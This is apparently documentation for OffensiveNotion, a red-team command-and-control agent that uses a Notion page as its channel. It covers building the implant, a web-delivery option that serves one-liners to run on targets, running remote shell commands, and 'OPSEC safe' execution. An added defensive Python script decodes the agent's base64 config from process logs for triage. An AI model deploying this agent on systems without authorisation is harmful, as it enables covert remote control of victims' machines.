2. Quickstart
How do I get this thing working so I can see what it can do?
- Make a Notion account
- Make a Notion API developer account
- Create a page in your Notion book (any page will do). This is your "Listener." Copy the final part of the URL or press Ctrl+L in the Desktop app. This is your parent page ID. Keep track of it for a moment. Deck out your page with a banner and emoji icon. Have fun with it.
- In the upper-right corner of your Notion page, click "Share" and "Invite." Add your Notion Developer API account to this page.
- Download the Release agent.
- Run the release agent in debug mode (`-d`) and input the values for each prompt.

  ```
  husky@ubuntu:~/Desktop/OffensiveNotion/bin/linux_debug/debug$ ./offensive_notion -d
  [*] Starting!
  Getting config options!
  [*] Enter agent sleep interval > 5
  [*] Enter agent jitter time > 0
  [*] Enter parent page id > [...your parent page ID..]
  [*] Enter API Key > [...your API key...]
  [*] Enter Config File Path > [leave blank]
  [*] Enter Log Level (1-4) > 2
  ```
- Your agent should now check into your Listener page.
- Run commands! Make a To-Do block (`/todo` in the Notion app), enter `shell whoami 🎯`, and watch the magic unfold.
See the Agent Interaction section for the full list of available commands.
The Python script (`main.py`) is included as a quick and easy agent configuration/generation utility. It must be run with root privileges and has some dependencies.
The primary purpose of the Python script is to make it easy for the operator to set the agent's config parameters in the code of the agent itself so it can be run without arguments. The script automates all of the steps required to do so.
```
husky@ubuntu:~/Desktop/OffensiveNotion$ sudo python3 main.py -h
usage: main.py [-h] [-o {linux,windows}] [-b {debug,release}] [-c] [-w] [-m {powershell,wget-linux,wget-psh,python-linux,python-windows}] [-ip HOSTIP] [-p PORT]

OffensiveNotion Setup. Must be run as root. Generates the OffensiveNotion agent in a container.

optional arguments:
  -h, --help            show this help message and exit
  -o {linux,windows}, --os {linux,windows}
                        Target OS
  -b {debug,release}, --build {debug,release}
                        Binary build
  -c, --c2lint          C2 linter. Checks your C2 config by creating a test page on your Listener.
  -w, --webdelivery     Start a web delivery server to host and deliver your agent. Provides convenient one liners to run on the target.
  -m {powershell,wget-linux,wget-psh,python-linux,python-windows}, --method {powershell,wget-linux,wget-psh,python-linux,python-windows}
                        Method of web delivery
  -ip HOSTIP, --hostIP HOSTIP
                        Web server host IP.
  -p PORT, --port PORT  Web server host port.
```
The `main.py` script handles all setup and agent compilation. You need Docker in order to use it.

If you don't have Docker already:

```
$ sudo apt-get install docker.io
```

Next, install the Python dependencies:

```
$ pip3 install poetry
$ poetry shell
$ poetry install
```

Then run the main script:

```
$ sudo python3 main.py [-h] [-o {linux,windows}] [-b {debug,release}] [-c] [-w] [-m {powershell,wget-linux,wget-psh,python-linux,python-windows}] [-ip HOSTIP] [-p PORT]
```

The only two arguments that are required are `-o`, for the OS, and `-b`, for the build (debug or release). The additional arguments are covered in the Misc section.

Once the script is running, follow the prompts to perform the installation. It creates a Docker container, builds the agent inside it, copies the agent to your physical host, and then deletes the container.
The compiled agent can be run with a few different arguments. There is no help menu for the compiled agent, so please reference the following for its possible parameters:
If the agent has been compiled with default values for its parameters (i.e. with `main.py`), those values are used by the agent when running with no arguments. This is the most OPSEC safe way to execute the agent. See the Quickstart guide and `main.py` for more information.

If the agent has not been compiled with default values for parameters, it will attempt to locate `cfg.json` in the current working directory. If this file is present, it will run with those parameters.

If there is no `cfg.json` file available in this case, the agent will exit without establishing a connection.
The `-d` flag allows you to input each agent parameter via the CLI. Recommended for debugging and testing. Not recommended for operations.

Example:

```
$ ./offensive_notion -d
[*] Starting!
Getting config options!
[*] Enter agent sleep interval > 5
[*] Enter agent jitter time > 3
[*] Enter parent page id > [....parent page ID....]
[*] Enter API Key > [...API key...]
[*] Enter Config File Path >
[*] Enter Log Level (1-4) > 5
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID...]", api_key: "[...API key...]", config_file_path: "", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds
```
The `-b` flag allows a base64-encoded version of the configuration options to be passed at execution.

Example:

```
$ ./offensive_notion -b eyJzbGVlcF9pbnRlcnZhbCI6NSwiaml0dGVyX3RpbWUiOjMsInBhcmVudF9wYWdlX2lkIjoiWy4uLi4gcGFyZW50IHBhZ2UgSUQuLi5dIiwiYXBpX2tleSI6IlsuLi4uc2VjcmV0IGtleS4uLl0iLCJjb25maWdfZmlsZV9wYXRoIjoiY2ZnLmpzb24iLCJsYXVuY2hfYXBwIjpmYWxzZSwibG9nX2xldmVsIjo1fQ==
[*] Starting!
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID...]", api_key: "[...API key...]", config_file_path: "", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds
```
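
Added example, not part of the OffensiveNotion project: because `-b` carries the whole configuration on the command line, process-creation logs that capture it can be decoded during triage to scope the Notion page involved while keeping the API key out of alerts. It assumes the field set shown in the `ConfigOptions` output above; the function names and the last two sample lines are constructed for illustration.

```python
import base64
import json
import shlex

# Field names taken from the ConfigOptions output shown on this page.
CONFIG_KEYS = {"sleep_interval", "jitter_time", "parent_page_id", "api_key",
               "config_file_path", "launch_app", "log_level"}


def decode_config_arg(token):
    """Return the decoded config dict if token is a base64 JSON config, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
        obj = json.loads(raw.decode("utf-8"))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return None
    if not isinstance(obj, dict) or not CONFIG_KEYS.issubset(obj):
        return None
    return obj


def triage_cmdline(cmdline):
    """Scan one process command line; report a matching config with the key redacted."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in captured telemetry
        argv = cmdline.split()
    for flag, value in zip(argv, argv[1:]):
        if flag == "-b" and (cfg := decode_config_arg(value)) is not None:
            # Keep the page ID for scoping; never copy the API key into alerts.
            return {"image": argv[0],
                    "parent_page_id": cfg["parent_page_id"],
                    "sleep_interval": cfg["sleep_interval"],
                    "jitter_time": cfg["jitter_time"],
                    "api_key": "<redacted>"}
    return None


# Constructed telemetry; the first line reuses the placeholder blob from the example above.
SAMPLE = [
    "./offensive_notion -b eyJzbGVlcF9pbnRlcnZhbCI6NSwiaml0dGVyX3RpbWUiOjMsInBhcmVudF9wYWdlX2lkIjoiWy4uLi4gcGFyZW50IHBhZ2UgSUQuLi5dIiwiYXBpX2tleSI6IlsuLi4uc2VjcmV0IGtleS4uLl0iLCJjb25maWdfZmlsZV9wYXRoIjoiY2ZnLmpzb24iLCJsYXVuY2hfYXBwIjpmYWxzZSwibG9nX2xldmVsIjo1fQ==",
    "tar -b 20 -cf backup.tar /etc",
    "./tool -b bm90IGpzb24=",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage_cmdline(line))
```

Matching on the decoded field set rather than the binary name keeps the check useful when the agent has been renamed.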
The `-c` flag passes a config file path to the agent, which reads its configuration from that file.

Example:

```
$ cat cfg.json
{"sleep_interval":5,"jitter_time":3,"parent_page_id":"[...parent page ID...]","api_key":"[...APi key...]","config_file_path":"cfg.json","launch_app":false,"log_level":5}
$ ./offensive_notion -c cfg.json
[*] Starting!
Object({"api_key": String("[....API key.....]"), "config_file_path": String("cfg.json"), "jitter_time": Number(3), "launch_app": Bool(false), "log_level": Number(5), "parent_page_id": String("[...parent page ID...]"), "sleep_interval": Number(5)})
[+] Admin context: false
[+] Hostname: ubuntu
[?] Config options: ConfigOptions { sleep_interval: 5, jitter_time: 3, parent_page_id: "[...parent page ID....]", api_key: "[...API key....]", config_file_path: "cfg.json", launch_app: false, log_level: 5 }
[+] Creating page...
[+] zzzZZZzzz: 5 seconds
```